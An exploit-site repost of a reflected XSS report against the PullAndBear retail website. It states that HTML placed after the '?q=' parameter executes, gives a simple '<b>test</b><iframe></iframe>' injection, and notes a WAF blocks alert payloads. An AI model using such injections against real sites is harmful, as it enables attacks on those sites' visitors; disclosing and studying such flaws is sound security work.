PullAndBear Reflected XSS Vulnerability

CVE Category Price Severity
CVE-2021-3521 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-07-26

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

PullAndBear Reflected XSS Vulnerability
#Exploit Title: PullAndBear Reflected XSS Vulnerability
#Date: 24-07-2023
#Exploit Author: BQX ( ./Bertw_QX )
#Vendor Homepage:
#Category: Reflected XSS
#Tested On: Windows 10 - Google Chrome<b>test</b><iframe></iframe>

The html codes written after the ?q= parameter are executed on the page.

Not: Because of waf, codes like alert don't work
err: Access Denied
You don't have permission to access "" on this server.
Reference #18.7fc11302.1690229077.2415c6fa

#Telegram: @bqxsec
#Telegram Channel:
#Instagram: @bqxsec
#Mail: [email protected]

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.